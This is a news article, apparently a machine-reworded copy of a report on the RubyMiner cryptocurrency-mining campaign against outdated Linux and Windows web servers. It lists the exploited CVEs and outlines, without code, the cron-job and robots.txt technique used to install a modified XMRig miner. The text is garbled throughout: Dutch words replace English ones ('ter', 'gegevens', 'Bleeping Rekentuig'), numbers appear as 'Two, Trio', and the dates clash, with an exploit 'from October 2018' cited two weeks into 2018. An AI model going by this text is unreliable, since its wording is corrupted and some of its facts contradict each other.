Linux and Windows Servers Targeted with RubyMiner Malware

Security researchers have spotted a fresh strain of malware being deployed online. Named RubyMiner, this malware is a cryptocurrency miner spotted going after outdated web servers.

According to research published by Check Point and Certego, and information received by Bleeping Pc from Ixia, attacks commenced on January 9-10, last week.

Attackers target both Linux and Windows servers

Ixia security researcher Stefan Tanase told Bleeping Rekentuig that the RubyMiner group uses a web server fingerprinting contraption named p0f to scan and identify Linux and Windows servers running outdated software.

Once they identify unpatched servers, attackers deploy well-known exploits to build up a foothold on vulnerable servers and infect them with RubyMiner.

Check Point and Ixia say they`ve seen attackers deploy the following exploits te the latest attack wave:

PHP php-cgi Query String Parameter Code Execution (CVE-2012-1823, CVE-2012-2311, CVE-2012-2335, CVE-2012-2336, CVE-2013-4878) [1, Two, Trio, Four]

Microsoft IIS ASP Scripts Source Code Disclosure (CVE-2005-2678) [1]

It instantaneously stands out that RubyMiner targets both Windows and Linux systems alike.

Attackers hide malicious code te robots.txt files

Ter a report published last week, Check Point has cracked down RubyMiner`s infection routine on Linux systems, based on gegevens collected from their honeypot servers. There are some things that stand out right away, at least because of the attackers` creativity:

Attackers clear all cron jobs

Attackers add a fresh hourly cron job

Fresh cron job downloads a script hosted online

This script is hosted inwards the robots.txt verkeersopstopping of various domains

The script downloads and installs a modified version of the legitimate XMRig Monero miner application.

Check Point security researcher Lotem Finkelstein told Bleeping Rekentuig that they`ve seen attackers target Windows IIS servers, but they have not bot able to obtain a copy of the Windows version of this malware just yet.

This attack also stood bijzonder because one of the domains attackers used to hide malicious directives ter the robots.txt verkeersopstopping (lochjol[.]com) wasgoed also used ter a previous malware campaign, te 2013 [1, Two].

That malware campaign also utilized the same Ruby on Spoorlijn exploit deployed te the RubyMiner attacks, suggesting the same group that wasgoed behind those attacks is most likely now attempting to spread RubyMiner.

Rising trend ter Monero-mining malware

Overall, there`s bot a rise te attempts to spread cryptocurrency mining malware ter latest months, especially malware that mines for Monero.

Two weeks ter 2018 and we`ve already seen PyCryptoMiner targeting Linux servers and another group targeting Oracle WebLogic servers.

Ter most of the incidents mentioned above that targeted web servers, attackers attempted to use latest exploits, spil there would be more vulnerable machines to infect.

The RubyMiner attacks are peculiar because attackers use very old exploits, which most security software would be able to detect, and which would have alerted server owners.

Finkelstein told Bleeping Laptop that attackers might have bot looking for abandoned machines on purpose, such spil ",forgotten PCs and servers with old OS versions,", that sysadmins left behind they left online.

",Infecting them would ensure long periods of successful mining underneath the security radar, ",Finkelstein says.

RubyMiner squad infected 700 servers

Check Point waterput the number of servers infected with RubyMiner at around 700 and estimated the attackers` earnings at $540, based on the wallet addresses found ter the custom-built XMRig miner deployed by the RubyMiner malware.

Many would argue that the group would be more successful and earn more money if they`d use more latest exploits instead of ten-year-old vulnerabilities. For example, a group that targeted Oracle WebLogic servers with an exploit from October 2018 made a whopping $226,000.

More information about the RubyMiner attacks are available te reports from Check Point and Certego.

Related movie: HashOcean Plusteken Español Bitcoin cloud mining

Leave a Reply

Your email address will not be published. Required fields are marked *